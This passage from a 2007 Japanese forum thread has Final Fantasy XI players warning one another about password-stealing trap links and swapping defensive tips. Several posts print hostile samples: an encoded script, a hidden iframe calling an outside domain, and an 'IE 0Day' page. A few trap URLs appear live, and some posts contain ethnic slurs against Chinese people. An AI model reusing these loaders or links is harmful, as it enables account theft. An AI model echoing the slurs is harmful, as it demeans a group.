グーグルで”ブラクラチェッカー”とか検索するのがベター。


265 :既にその名前は使われています:2007/10/16(火) 01:26:00.84 ID:yhgaGjN0
ICPOの出番マダー?


266 :既にその名前は使われています:2007/10/16(火) 02:15:28.80 ID:X2F9wGKW
これはどう対処すればいいんかなぁ
■に通報トカカネ?


267 :既にその名前は使われています:2007/10/16(火) 02:30:58.96 ID:cHZ+9+L6
対処は個々人でセキュリティアップと危機感持ってネットするしかないんだろうな
と言いつつ、自分も素人レベルなんで参考にしてみたサイトをピックアップしてみる


他MMOのサイトだけど被害内容は同じ、対策として読むのにどぞ
http://www.mc.ccnw.ne.jp/kumakuma-sakura/ragna-security/ragna-security.htm#SStag

ブラウザの設定、よくわからんって人にどぞ
http://www.affrc.go.jp/ja/info/kenshu/INTRO/2_browser_1.html


上のリンク先に不安のある人は上で紹介してくれたサイトで調べてみよう!

>>222 より

怪しいURLは先にこれで調べる!これが勝利のカギだ!
■aguse.net
http://www.aguse.net/


268 :既にその名前は使われています:2007/10/16(火) 02:47:04.11 ID:6f+ohICl
今日コピペはりつけてるのは
ID:SCechboh
の模様、気をつけたし


269 :既にその名前は使われています:2007/10/16(火) 02:47:56.67 ID:Uor/OgYr
489 名前: 既にその名前は使われています 投稿日: 2007/10/16(火) 02:40:05.65 ID:SCechboh
FF11史上の最も強い日記
詳しい情況は見る
http://tinyurl.com/35vg2o

491 名前: 既にその名前は使われています 投稿日: 2007/10/16(火) 02:41:19.17 ID:SCechboh

FF11/FFXI全く新しいです武器.防具一覧
詳細はリンク先ページを参照下さい。
http://tinyurl.com/33oht5


って中華が鯖スレにもきたよー


270 :既にその名前は使われています:2007/10/16(火) 02:51:21.90 ID:mAix3oxf

315 名前:既にその名前は使われています[] 投稿日:2007/10/16(火) 02:43:47.21 ID:SCechboh

FF11狩場,攻略,販売,BBS,武器防具製作
URL: http://www■sakerver■com/wiki/
FF11公式ページ。FF11狩場 スクリーンショット,ヒンデミットサーバー所属のドワーフによる武器、防具製作.FF11記者 FF11攻略 FF11販売
http://www■sakerver■com/wiki/


271 :既にその名前は使われています:2007/10/16(火) 02:53:34.75 ID:PW6pzeCH
>>264
やっぱエキサイトのそれスパムかねぇ。
この前踏んだけどなんも反応なかったから意味不明だったんだが。
まぁPS2組だから関係ないけど。


272 :既にその名前は使われています:2007/10/16(火) 02:54:03.72 ID:nZV52vKh
ヒンデミットサーバーってどこなんだよ('A`)


273 :既にその名前は使われています:2007/10/16(火) 02:54:41.37 ID:Uor/OgYr
ドワーフ実装かよw


274 :既にその名前は使われています:2007/10/16(火) 02:55:09.31 ID:5DTfD3A6
>>269
直で繋がるのはヤバイってwww
頼むから削ってくれ。



275 :既にその名前は使われています:2007/10/16(火) 02:55:55.10 ID:nZV52vKh
つか、直で貼るやつは中華と同罪だぞ…('A`)


276 :既にその名前は使われています:2007/10/16(火) 02:56:03.71 ID:mAix3oxf
>>270は「お兄ちゃんは悪くない」スレに投下されたもの
中華さん何でそんなスレ選んでるの^^^;;;;;;


277 :既にその名前は使われています:2007/10/16(火) 02:59:07.40 ID:Uor/OgYr
>274-275
すまん


278 :既にその名前は使われています:2007/10/16(火) 03:02:20.78 ID:nZV52vKh
罰としてナジャ社長で1本抜いてこい
ミリでもいいぞ、ただしアフマウは許さんが('A`)


279 :既にその名前は使われています:2007/10/16(火) 03:05:04.68 ID:7kVGlWN7
とりあえずtinyurlに飛んでpreview feature→URLに飛ぶ前に一度確認する機能をenable ってしとけよ
これでURL変換の奴は回避できるから
後firefoxならリンクにカーソル持ってくと窓下部にURL先出るから
これも活用すれば大丈夫だろう、wiki見なければ。
下手なソフトに頼るより自分でできる事した方がずっと効果的


280 :既にその名前は使われています:2007/10/16(火) 03:05:09.77 ID:7QCjZTF0
ゲーム内で中華みかけなくなったと思ったら今度は
その周辺かよ。
うぜー。まじうぜー。あいつらマジで絶滅すりゃいいのに。


281 :既にその名前は使われています:2007/10/16(火) 03:11:39.78 ID:7kVGlWN7
後変な物踏んだ!と思ったらすぐ回線抜け
間違っても回線繋いだままだらだらしないようにするんだ


282 :既にその名前は使われています:2007/10/16(火) 05:20:09.01 ID:5LRHx3ia
ほす


283 :既にその名前は使われています:2007/10/16(火) 05:37:14.59 ID:5DCICMq9
質問!
このスレタイ通りパス抜かれたかったっぽいんだけど、どうしたら良いかな?
かなり焦ってて…

■に電話したらまたFFできるかな?誰か助けて(T_T)


284 :既にその名前は使われています:2007/10/16(火) 05:39:28.45 ID:pDgo4EFy
25時間ログインしてればあっちはインできないんじゃね?


285 :既にその名前は使われています:2007/10/16(火) 05:40:15.60 ID:5DCICMq9
まずいな、上手く日本語書けてないw
パス抜かれちゃったっぽい です。


286 :既にその名前は使われています:2007/10/16(火) 05:40:21.56 ID:KckLGoqC
>>283
もっと状況を詳しく話せ。


287 :既にその名前は使われています:2007/10/16(火) 05:41:12.90 ID:mAix3oxf
>>284
後からログインしたほうが優先されて先にログインしていた端末は落とされる


288 :既にその名前は使われています:2007/10/16(火) 05:44:56.35 ID:y+JIyURH
逆に考えるんだ、FFをやめるための手助けをしてくれてると!


289 :既にその名前は使われています:2007/10/16(火) 05:47:43.75 ID:n3qAHWsV
中国、今年はものすごいベビーブームで病院のベッドが足りないらしいぜ。
廊下で生むような事態にもなってるとか。
一人っ子政策ってどうなったんだよ。増えすぎだろ。
まあ、中国人使ってるのは日本の怖い人なんだろうけどな。


290 :既にその名前は使われています:2007/10/16(火) 05:54:07.78 ID:MhlAKTnn
>>287
逆じゃ?


291 :既にその名前は使われています:2007/10/16(火) 05:57:38.05 ID:y3ek2zI0
>>283
パス抜かれたとは何をもって判断したわけ?
とりあえずオフィシャルにはハックに遭ったらGM呼べと書いてあるからGM呼んだら?
ま、解決しないと思うけど…


292 :既にその名前は使われています:2007/10/16(火) 06:00:24.10 ID:gTf1J0CJ
>>290
逆じゃない、リアフレとアカを共有していた時期があったんだが、キャラは別で端末もそれぞれの家に持ってた。
俺がプレイ中してる時に奴がインしてきたら俺が落とされた、多重ログインの場合は後からインしたほうが優先される。
「他の誰かがログインしているのでログインすることが出来ません、時間を置くか他にインしている人がいないかご確認ください」などの表示は一切無かったそうな。


293 :既にその名前は使われています:2007/10/16(火) 06:09:43.44 ID:MhlAKTnn
>>292
フレリスト見られるツールだと後から起動しても入れないからそうだと思ったんだけど
後から入った方が優先されるって多重ログインの制御できてないとしか思えない・・・




294 :既にその名前は使われています:2007/10/16(火) 06:10:07.73 ID:H4gp1iop
volume@rondo.ocn.ne.jp

ヤフオク詐欺師 通報しといた。


295 :既にその名前は使われています:2007/10/16(火) 06:15:26.97 ID:MKmjjcZX
>>292
>「他の誰かがログインしているのでログインすることが出来ません、時間を置くか他にインしている人がいないかご確認ください」などの表示は一切無かったそうな。

これって「他の誰かが~」じゃなくて「既にそのキャラクターは~」だろ
クライアント側が落ちて最速で復帰させると表示される

>>293
後入り優先にしないとダメだろ
自分以外が不正にログインしたら対処手段が0になる


296 :既にその名前は使われています:2007/10/16(火) 06:18:55.11 ID:MhlAKTnn
>>295
自分がログインしてて後から不正ログインされるのは?



297 :既にその名前は使われています:2007/10/16(火) 06:19:05.04 ID:adby4ThT
2年前のノートン使ってるんですけどやばいですか?


298 :既にその名前は使われています:2007/10/16(火) 06:20:52.39 ID:MKmjjcZX
>>296
再ログインしなおせばおk



299 :既にその名前は使われています:2007/10/16(火) 06:22:02.40 ID:MhlAKTnn
>>298
それ、ただのイタチごっこじゃん


300 :既にその名前は使われています:2007/10/16(火) 06:23:28.64 ID:MKmjjcZX
>>299
後入り不可にするとそのいたちごっこすら不可能なわけで
自分がログインしてない時に他人が不正にログインしたら一貫の終わりになっちまうんだぜ?


301 :既にその名前は使われています:2007/10/16(火) 06:23:46.44 ID:Uor/OgYr
POLにはかぶっててもログインできるので
そこでパスかえるかGMよぶかしとけ


302 :既にその名前は使われています:2007/10/16(火) 06:24:58.46 ID:MhlAKTnn
>>300
だから「IDとパスワードは厳重に管理して下さい」だと思うんだけど


303 :既にその名前は使われています:2007/10/16(火) 06:26:48.26 ID:S9DgbTa2
赤玉出して落ちるとすぐには入れなかったよね?
いたちごっこになった時は線抜いて落ちてパスワードを変えてログインが今のところ最良?


304 :既にその名前は使われています:2007/10/16(火) 06:27:56.41 ID:gTf1J0CJ
元々アカウントの共有は規約違反、パスやID抜かれたのは自分のミス。
最初っから多重ログインを想定してないんじゃないかね。あくまでもイレギュラーな事態なんだし。


305 :既にその名前は使われています:2007/10/16(火) 06:28:13.42 ID:Uor/OgYr
業者にパス変えられる前にPOLログインして
気休めにパス変えてGMコール

それもできない段階ならサポセンに電話


306 :既にその名前は使われています:2007/10/16(火) 06:30:19.46 ID:B1s7+j/y
>>303
もしキーロガーとか使われてたら効果薄いけどなぁ、やらないよりは良い。
まず落ち着いて、ウィルスとスパイウェアチェックしてからパスを変更かな。


307 :既にその名前は使われています:2007/10/16(火) 06:34:37.11 ID:mAix3oxf
スパイウェア対策ソフト教えてくれ
spybotはバグ多すぎてだめだわ


308 :既にその名前は使われています:2007/10/16(火) 06:39:55.86 ID:SD/jYCjO
>>305
のID危ないのでアボンでもするかな。


309 :既にその名前は使われています:2007/10/16(火) 06:40:53.68 ID:LSFdGJt4
>>292
だね。
別の端末から同じアカで入ると、その時ログイン中のプレイヤーは強制的にログアウト食らう。
BC戦闘中に、フレが回線落ちして帰ってきたと思ったら中の人が【素人】に変わってて全滅したこともあったわw


310 :既にその名前は使われています:2007/10/16(火) 06:42:10.77 ID:gTf1J0CJ
>>283まだ見てるか知らんが

>>168-169>>193とかを参考に

あと危なそうなurlはここでチェック汁
■aguse.net
http://www.aguse.net/


311 :既にその名前は使われています:2007/10/16(火) 06:47:41.47 ID:gTf1J0CJ
と、ここで↑にURLを踏んだ人は要注意。せめてURLをググる位はしたほうがいいと思う。
いや安全なサイトなんだけどねw


312 :既にその名前は使われています:2007/10/16(火) 07:16:15.66 ID:pvxPWcjj
>>272-273
これリネIIの情報を改変しただけじゃね?('A`)


313 :既にその名前は使われています:2007/10/16(火) 07:20:36.08 ID:Vd4L1EgX
ブログやってる奴も、コメントのURL欄消して、
本文の拒否設定とか禁止設定に「http」入れようぜ。
そしたらまあ小中国人どももh抜きで書き出すだろうけど、
自動リンクされなてなければ読者もドメインでおかしいとわかるだろ。


314 :既にその名前は使われています:2007/10/16(火) 07:22:22.88 ID:jTqJcCaj
これはあげなきゃでしょう


315 :既にその名前は使われています:2007/10/16(火) 07:25:08.67 ID:cHZ+9+L6
うちも罠コメ付いてた

内容
両手武器は劇的に変わったった。
STR=攻1 DEX=命中1になった事で
肉食もできて更にパワーうp。

上で書いててくれた人がいたんですぐ分かったよ、thx
夏頃にも中華爆撃あった時は、本文中にURLがはってあったんでいかにも怪しそうだったけど
今回のは投稿者の名前にアドレスがリンクされてるだけなんで逆に引っかかりやすいかも

でもさー
うちFFのブログじゃないんだよね…
(FF関連の記事は一切なし)

知り合いのFFブログを何件かリンクしてるから、そこから来たのかな

とりあえずコメントを承認制にして対処した


316 :既にその名前は使われています:2007/10/16(火) 07:42:42.96 ID:a2a7cwVl
いまさら聞けない~スレにも早朝から来てたよ、中華
↓本当になりふりかまわなくなってきてるね…

--------------------------------------------
955 名前: 既にその名前は使われています 投稿日: 2007/10/16(火) 05:07:53.09 ID:SKKjLl6V
ttp://www●k5dionne●com/ 中国語だけどよめる?
本当はhttp://  www●k5dionne●com/  ffzuotu●jpg
なんだけど中国からFFパス抜くやく?  ↑にffと中国だからそう思っただけで


317 :既にその名前は使われています:2007/10/16(火) 07:50:00.79 ID:YJX/lSLi
Avasta入れてみたらトロイみつかった
こわいからPSでパス変えて今出社 帰ったら本格的に駆除しよう思うんだけど
修復できんかったらファイル削除だけでいいのかな?


318 :既にその名前は使われています:2007/10/16(火) 07:59:34.79 ID:NImg7AO6
ウィルスバスターじゃ検索しきれない?


319 :既にその名前は使われています:2007/10/16(火) 08:11:23.24 ID:gi39A9Yk
>>318
バスター使ってるならURLフィルタの禁止するWebサイトに登録しとけ
そうすれば誤って踏んでも開かないから、それにその行為がトレンドマイクロに通報する事にもなる

登録する時に間違って踏むなよ


320 :既にその名前は使われています:2007/10/16(火) 08:20:54.79 ID:BrfuAMzc
>>317
トロイが見つかったのなら、HDをクリーンインストールした方がいいよ




321 :168:2007/10/16(火) 08:29:13.46 ID:ur0bgfcq
一昨日践んで昨日仕事から帰ってから速攻でホコリかぶってたPS2引っ張り出してパス変えました
最終ログイン時間をみた感じだと無事みたいです


とりあえずPCを再セットアップ
ホント中国人はろくなことしないな


322 :既にその名前は使われています:2007/10/16(火) 08:38:31.81 ID:BrfuAMzc
>>321

被害なくて良かったな



323 :既にその名前は使われています:2007/10/16(火) 08:46:19.08 ID:TBFr8om6
>>321
ここまで派手に活動していたら踏む奴1人や2人ではないだろう
他の奴の垢が処理されているうちにお前はパスワードの変更ができたんだろうな


324 :既にその名前は使われています:2007/10/16(火) 09:08:07.26 ID:Qy6vgiqe
>>106です。手持ちのノートン2007とシマンテックのオンラインスキャンをしましたが、何も検出されませんでした。
ネカフェでパスも変更しましたが、検出されていないキーロガーとか有りそうで逆に怖いです。
ほかにやって置くべきことはありますか?このスキャンの方が信頼できる、とか



325 :既にその名前は使われています:2007/10/16(火) 09:12:17.14 ID:IghRgcRr
ネカフェでパス変更って一番やばいだろ・・・なんで自ら危険な領域に踏み込むんだ


326 :既にその名前は使われています:2007/10/16(火) 09:13:08.33 ID:2suVJgtX
かなり深刻な問題になってきているようだな


327 :既にその名前は使われています:2007/10/16(火) 09:19:38.13 ID:MXbjEJAw
とりあえず、バスターのURLフィルタ登録用リストを作ってみた
tp://www■blogplaync■com/
tp://www■xiaoriben■net/
tp://mbspro6uic■com/
tp://tinyurl■com/
tp://www■sakerver■com/
tp://www■k5dionne■com/

とりあえず、このスレに出てきた奴だけ
当然、これ以外にもヤバイサイトはあるだろうけど

頭にhtを入れて、/を半角に置き換え、■を.に置き換えるとヤバイサイトのURLになる
間違っても踏んだり、踏ませたりしようとするなよ・・・


328 :既にその名前は使われています:2007/10/16(火) 09:20:36.29 ID:F+6bcken
Blog持ちはコメントを公開許可制に変更した方がいい。
リアルタイム性は落ちるが、事前チェックが出来るだけでも遙かにマシ。
自分のサイトから被害者を出さないためにも今すぐ変更しとけ。


329 :既にその名前は使われています:2007/10/16(火) 09:30:16.96 ID:iM3lOWgO
<script language="javascript">var www_ucmm_cn="%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3EHello%21%3C/title%3E%0D%0A%3Cmeta%20name%3D%22author%22%20content%3D%22%u8
FF7%u7F51%22%20/%3E%0D%0A%3C/head%3E%0D%0A%3Cbody%3E%0D%0A%3Cscript%20langua
0D%0Awindow.onload%20%3D%20init%3B%0D%0A%3C/script%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E";www_ucmm_cn=unescape(www_ucmm_cn);document.write(www_ucmm_cn);</SCRIPT>


パス抜きサイトとか言われてるののソースの一部なのだが、これでパス抜けるのか?
書いてる内容がわかる奴、説明してくれ


330 :既にその名前は使われています:2007/10/16(火) 09:38:22.04 ID:y3ek2zI0
パス抜きの仕組みがよくわからんのだが、
オートログイン用に保存したデータからパスを抜いてるとか?
オートログイン設定じゃなければ被害には遭わないのだろうか


331 :既にその名前は使われています:2007/10/16(火) 09:46:52.56 ID:zu1PJ9rz
オートじゃなくても送信すれば同じことじゃね
入力した時点で読み取るスパイウェアもあることだしなー


332 :既にその名前は使われています:2007/10/16(火) 09:51:52.77 ID:TxLzMS4P
>>277
詩ねよチョンコ


333 :既にその名前は使われています:2007/10/16(火) 10:00:10.45 ID:GC85tEC3
>>329
>>263 でも書いたけど
そのコードは、バッファオーバーフローが発生し、遠隔からコマンド実行される恐れがあるコード
ダウンローダを仕込まれてから盗まれるんじゃないかな?

単純なURLエンコードだから、%3C → <、 %3E → > 等にデコードしてやると
<html><head><script>・・・みたいに html ソースが浮き出てくるよ
ちなみに<meta>タグ内に中国語ぽい言葉で『迷网』(%u8FF7%u7F51の部分)と書かれていたからexciteで訳したら『ネットに迷います』だってさ。

なめてやがるw


334 :既にその名前は使われています:2007/10/16(火) 10:18:21.76 ID:KdIEzkfq
ウイルスバスター2006のURLフィルタと個人情報保護機能は一部のブラウザにしか対応していません。
しかし、OperaやIEコンポーネントブラウザを使用している方など、対応させたい方も居るでしょう。
そういうときはレジストリを弄ることで「サポート対象外」ながらも対応させることはできます。

■■■■■■■■■注意■■■■■■■■■
レジストリの改変は危険を伴う操作です。
間違えると最悪Windowsを破壊してしまいます。
ここから先の操作は自己責任でお願いします。
■■■■■■■■■■■■■■■■■■■■

HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\NSC\TmProxy\ProtocolHandler\http\redirectに
Operaだったら「Opera」という名前で新規キーを作成して、既にあるAOLとかIEの例を参考にすれば
対応させることができます。

ちなみに、2005は、
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\TmProxy\ProtocolHandler\http\redirect
に同様の操作をすれば対応させることが可能です。
---
セキュ板の昔のバスターのテンプレよりコピペ
2007でも2006と同じやり方で可。書き加えた後リブートしましょう


335 :既にその名前は使われています:2007/10/16(火) 10:23:28.57 ID:/XSViLpQ
てか普段みんなJavaとかActivexきってHPみてないの?
昔の人間だとこれ結構当たり前だと思ってたんだが・・・・
まぁflashとか使ってるサイトはヘイト大になるんだけどさw


336 :既にその名前は使われています:2007/10/16(火) 10:28:43.20 ID:ddJgkC0R
うちのブログに
ttp://ff11link.blog122.fc2.com

なURL張ってあったんだけど・・罠サイト?


337 :既にその名前は使われています:2007/10/16(火) 10:28:51.67 ID:zu1PJ9rz
俺はダイアログを表示するにしてる
毎回ウゼーがもう慣れた
そのせいか未だにスクエニ公式まともに見れたことないw


338 :既にその名前は使われています:2007/10/16(火) 10:29:29.02 ID:UqVBJjOL
>>336
URLけずれっていってんだろうが!糞業者が!!!!!1111


339 :既にその名前は使われています:2007/10/16(火) 10:32:58.72 ID:qdE71hjD
「javascript」を切るとかなり鬱陶しいことになるが
「JAVA」はほとんど困らない。JAVAを必要とするサイトは少ない


340 :既にその名前は使われています:2007/10/16(火) 10:32:59.29 ID:ICfHr6ms
>>336
業者乙


341 :既にその名前は使われています:2007/10/16(火) 10:33:50.46 ID:qdE71hjD
ActiveXは論外。こんなもの要求するサイトは絶滅して欲しい


342 :既にその名前は使われています:2007/10/16(火) 10:36:49.09 ID:/XSViLpQ
>>339
いや、そんなこと得意げに説明されても普通みんなわかるだろ;;

まぁうっとうしいが、それでもへんな罠を回避できるにのは大きいからなぁ・・・
俺は公式はジョブ戦略板飛んでそこから公式リンクたどっていつも見てるな
まぁお気に入りにいれちまえば一発なんだが。


343 :既にその名前は使われています:2007/10/16(火) 10:38:50.93 ID:05SVTd3Q
自分の常識はみんなの常識とは限らんぞw


344 :既にその名前は使われています:2007/10/16(火) 10:42:17.66 ID:Q7gSgDUb
リネとROには垢ハック対策のまとめサイトがあるんだがFFにはないんだよな。
危険URLとかは全部リネのページを参考にしてる。


345 :既にその名前は使われています:2007/10/16(火) 10:43:04.48 ID:GC85tEC3
>>336 は罠サイト

ID:ddJgkC0R ← あぼーん推奨


346 :既にその名前は使われています:2007/10/16(火) 10:48:09.69 ID:/XSViLpQ
>>343
たしかになw失礼した;;

まぁ話の論点ずれたが一番の問題は普通のサイト
装ったり、wiki改ざんしたりとその手口が許せないってところだな



347 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 10:50:09.57 ID:l6Djc+Ck
>>336
<iframe width=100 height=0 src=http://www■yyjjoopp■com/main.htm></iframe>
<iframe width=600 height=1200 src=http://www2u■biglobe■ne■jp/~K340/ff11/></ifram
e>

Domain name: yyjjoopp■com

Registrant Contact:
Chensuzuki Network
Network Chensuzuki suniuqing001@163■com
13559988127 fax: 13559988127
Fujianlongyan
longyan Fujian 364000
cn

どう見ても中華です。本当にありがとうございました。



348 :既にその名前は使われています:2007/10/16(火) 10:52:12.95 ID:pohH9quR
どういう仕組みで抜いてるのか素人にはわからんのだが、
パス記憶させてなければ一応は大丈夫なのか?


349 :既にその名前は使われています:2007/10/16(火) 10:52:15.79 ID:K4ru9bn+
低脳なお前らが最高の獲物だよな。



350 :既にその名前は使われています:2007/10/16(火) 10:53:35.51 ID:trrJNVgd
WebWarez時代を駆け抜けてきた厨房連中は、守る術を自ら学んだものだけど
最近の連中はセキュリティーを守るすべを学ぶ機会が無いから、簡単な罠に引っかかっちゃうんだろうな・・・


351 :既にその名前は使われています:2007/10/16(火) 10:54:40.05 ID:6XmhKUYc
つうか、FF11の公式サイトムカつく!!
JAVA、アクティブX使いすぎだボケwwwwwww


352 :既にその名前は使われています:2007/10/16(火) 10:55:40.03 ID:22SLr4/7
今回罠を踏んだ奴で無料ウィルスチェックソフトで検出することが出来た奴居る?
ノートンやバスターは当然としてFFマシンにはコストの関係から意図的に製品を入れてない奴も居るだろうし
AVG、Spybot、Ad-aware、avast!で何でドレが引っかかったの情報共有した方がよさろう

俺の環境はAVGとAd-awareで未検出
WindowsUpdateやってるからそもそも引っかからなかった気がする


353 :既にその名前は使われています:2007/10/16(火) 10:56:32.71 ID:zu1PJ9rz
>347
@163■com ここからよく迷惑メール大量に来てたな
シナからの通信遮断してくれマジで


354 :既にその名前は使われています:2007/10/16(火) 10:56:52.81 ID:y3ek2zI0
336のリンク先は
aguse.netだと普通のfc2ブログに見えるんだが
どこで罠と判別できるんだ?


355 :既にその名前は使われています:2007/10/16(火) 10:59:28.75 ID:Z28ulux4
プレステでげーむしろ


356 :既にその名前は使われています:2007/10/16(火) 11:01:22.77 ID:mFNMB9D+
>>355
せめて凶箱360にしてくれw
そろそろ消えてなくなりそうなそんな古いゲーム機使っとれんwwww


357 :既にその名前は使われています:2007/10/16(火) 11:02:24.07 ID:KExOpnie
PS2組で良かったと思いつつ・・・業者死ねage


358 :既にその名前は使われています:2007/10/16(火) 11:02:46.94 ID:mFNMB9D+
つうか、マジで凶箱360に乗り換えようと思うんだが、
360用のボタン、アナログスティックがPS2配列のパッドって売ってない?
本体は持っているが、パッド使いにくくて最近触ってねー


359 :既にその名前は使われています:2007/10/16(火) 11:03:40.41 ID:GC85tEC3
>>352
言い出しっぺがやれw

とりあえず↓で十分。今のところ、リネ同じやつしかないよ (微妙な改竄はされてるけど)
ttp://lineage.nyx.bne.jp/misc/security/id_virus-sample.html

>>354
ソースは >>347
表示されているのとは別フレームで yyjjoopp.com を呼び出している。


360 :既にその名前は使われています:2007/10/16(火) 11:07:38.43 ID:TxLzMS4P
>>336
死ね


361 :既にその名前は使われています:2007/10/16(火) 11:08:34.08 ID:tTI4UwuO
avast!でURL踏んだ瞬間反応したかも
Loveletter-C[Wrm]ってこれかな?
壷でavast!が反応してるっぽいから間違いは無いんだろうけども
セキュリティソフトのログ見ると同時にノートンでも検出してるっぽいね。


362 :既にその名前は使われています:2007/10/16(火) 11:09:24.18 ID:3UEf/Ns1
>>354
携帯から見たら記事もタイトルもないブログだった。
恐らくはfc2の垢を普通に取って、中身のいろんなリンクを全部アカハックアドレスに
繋いでいるのだと思われ。

ちょっと昔に似たようなのがエキサイトでもあった。
垢をやっぱり普通に取って、記事はどこぞの攻略系ブログからコピペ、
そのうえであらゆるリンクが罠サイト逝きという…。
無論今は退会処分食らって消えてるはず。


363 :既にその名前は使われています:2007/10/16(火) 11:11:03.13 ID:086gG1tR
ttp://live25.2ch.net/test/read.cgi/ogame/1192452964/
狼鯖、FFの癌です。皆様一読お願い致します<m(__)m>


364 :既にその名前は使われています:2007/10/16(火) 11:11:06.45 ID:GC85tEC3
>>361
これまたすげー懐かしい Virus だなww
昔のとは違うのかな? ちなみにどこを踏んだん?


365 :既にその名前は使われています:2007/10/16(火) 11:11:08.99 ID:YJX/lSLi
wiki見る分には問題ないのんだよね?そこからの怪しいリンク飛んだら感染てこと?


366 :既にその名前は使われています:2007/10/16(火) 11:12:03.61 ID:3UEf/Ns1
うあ、ちゃんと端的な解説されてたw
リロード汁自分…


367 :既にその名前は使われています:2007/10/16(火) 11:13:21.67 ID:y3ek2zI0
>>659 >>362
うは、マジか…
fc2にFFブログ多いのに、怖くて見れねえじゃん
とりあえずfc2に通報しとく


368 :既にその名前は使われています:2007/10/16(火) 11:13:24.88 ID:KdIEzkfq
>>365
よく見ると改組されてる事があるから怪しくなくても飛び先を確認


369 :既にその名前は使われています:2007/10/16(火) 11:18:05.67 ID:x00Iu9Dl
最近のトロイはマジやばいんだよ
現状のセキュリティソフトじゃ全く歯が立たない
何かが検出されて「ほとんど影響なし」とか出ても、それは安心させるための
カモウィルスと思え


370 :既にその名前は使われています:2007/10/16(火) 11:18:25.79 ID:tTI4UwuO
>>364
エル尻スレあたりだったか?
多分安田美沙子?の写真貼られてたものから検出

定期的に通ってるスレなんだ(´・ω・`)


371 :既にその名前は使われています:2007/10/16(火) 11:21:10.89 ID:tTI4UwuO
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
tp://www■k5dionne■com/ffzuotu■jpg

御尻が見えた気がしたんでs;;



372 :既にその名前は使われています:2007/10/16(火) 11:24:29.31 ID:GC85tEC3
>>365
wiki の設定やバージョンによっては見るだけでも問題が発生する場合があるので注意
(FFの罠サイトで wiki の脆弱性をついているのは俺は見たことがないけど)
とりあえず↓をしっかりやれば基本的に問題ないよ

1. Windows Up Date をする (現在は基本的に月1回)
2. AntiVirusソフトの定義ファイルを更新する (毎日)
3. ActiveX,JavaScript,VBScript を off にする

注意点
・ステータスバーは最新パッチ適用済み IE でも改竄ができるのであまり信用しない
・短縮URLで一見わかりにくくなっている場合がある
・.jpg 等であってもリダイレクトされる事がある

>>371
サンクス今から見てくる


373 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 11:33:22.38 ID:l6Djc+Ck
今張られている罠サイトって、ほとんどがリネージュ資料室に書かれてるドメインばっかりです。
なので、hostsを使って罠サイトをローカルに向けるだけでかなり防げるんじゃないでしょうか。



374 :既にその名前は使われています:2007/10/16(火) 11:36:51.12 ID:y3ek2zI0
fc2ブログを擬態した罠サイトがあったら
ここから削除依頼できるんで皆も通報よろすく

ttp://form1.fc2.com/form/?id=49541


375 :既にその名前は使われています:2007/10/16(火) 11:37:33.61 ID:Hym7OGsF
>>348みたいなのはWinnyで個人情報流出しまくってそうだな

つーかレジストリの存在ぐらい知っとけおまいら


376 :既にその名前は使われています:2007/10/16(火) 11:39:36.49 ID:GC85tEC3
>>371
ごめん勇気を振り絞ってエロ暴露してくれたのにww
今の俺の環境だと sanffm.htm がもってこれないorz
とりあえず、jpgに見せかけているだけで、画像はgif、sanffm■htmまで呼び出しているから
罠サイトだと思っていいと思う。

↓↓↓ソース↓↓↓
<html>
<iframe src="sanffm■htm" height=0 width=0></iframe>
<img src="gss■gif"></center>
</html>


377 :既にその名前は使われています:2007/10/16(火) 11:41:19.55 ID:khBMfGCh
次スレに移行するようなことになったらスレタイにURL削れって入れね?
【URLは】中華系罠サイトへのリンク警報2【削るか変更】
とかこんなので、1にテンプレで
http://www.xxx.com/yyy/ は ttp://www■xxx■com/yyy/
のように全角文字や記号でリンク踏めないようにしろ、とかさ。

俺はネット専用PCにMacintosh(OS9www)使ってるしFFXI専用PCは
月に1~2回くらいOSのクリーンインストールもして自衛してるけど
自分のブログに張られた罠サイト踏んじゃう読者がいるんじゃないかと思うと
他人事には思えないんだよな(´Д`;
コマメにチェックして削除してはいるけどな・・・たまにいるんだよ踏んじゃうヴォケが・・・


378 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 11:47:13.65 ID:l6Djc+Ck
>>376
sanffm.htmの中身

<html>
<head>
<meta http-equiv=";Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
以下、謎のバイナリコード

super IE 0Dayとか書いてあるけど、IEの脆弱性をつくコード入りなのかもね。



379 :既にその名前は使われています:2007/10/16(火) 12:01:53.92 ID:fuv7QfAB
http://d.hatena.ne.jp/keyword/Super%20IE%200day

Super IE 0dayってこれだね

なんかひどい状態やね


380 :既にその名前は使われています:2007/10/16(火) 12:12:37.38 ID:ZTsM7CV9
報復手段は無いものかね。やられっぱなしは悔しいんだぜ?


381 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 12:23:31.71 ID:l6Djc+Ck
>>380
国家としてアタックをするようなところですから。
個人的な報復はむずかしいでしょうね。
現状、自衛をしっかりするのが最良の方法かと。



382 :既にその名前は使われています:2007/10/16(火) 12:26:44.17 ID:7lOzvimz
>>380
RMTや垢売買に関わらない



383 :既にその名前は使われています:2007/10/16(火) 12:29:26.42 ID:Il2PW/Et
日本海の海底ケーブルを切断する!


384 :既にその名前は使われています:2007/10/16(火) 12:30:33.95 ID:yhgaGjN0
中国公安部に「将来中国共産党の統率を乱す恐れがある組織」という内容で通報する


385 :既にその名前は使われています:2007/10/16(火) 12:31:16.19 ID:fuv7QfAB
感染?とか思う人は
取り合えずブラウザとか閉じて
スタート -> すべてのプログラム -> アクセサリ ->コマンドプロンプト

C:\WINDOWS>
の横に netstat -a と入力

そうすると今の状態がずらずらっと。
その中の一番右側 Stateの部分がESTABLISHED ってでてるのがあれば
それが今接続されているアドレス。

そのアドレスが分からない所のなら
http://www.mse.co.jp/ip_domain/ いっって調べればわかるはず




386 :既にその名前は使われています:2007/10/16(火) 12:33:28.77 ID:ZSPjFQ2k
仮に引っかかってもFFなんかで恥ずかしくて被害届だせないよなw


387 :既にその名前は使われています:2007/10/16(火) 12:34:36.18 ID:fuv7QfAB
上のはトロイの場合の検索方法ね。



388 :既にその名前は使われています:2007/10/16(火) 12:39:51.51 ID:yhgaGjN0
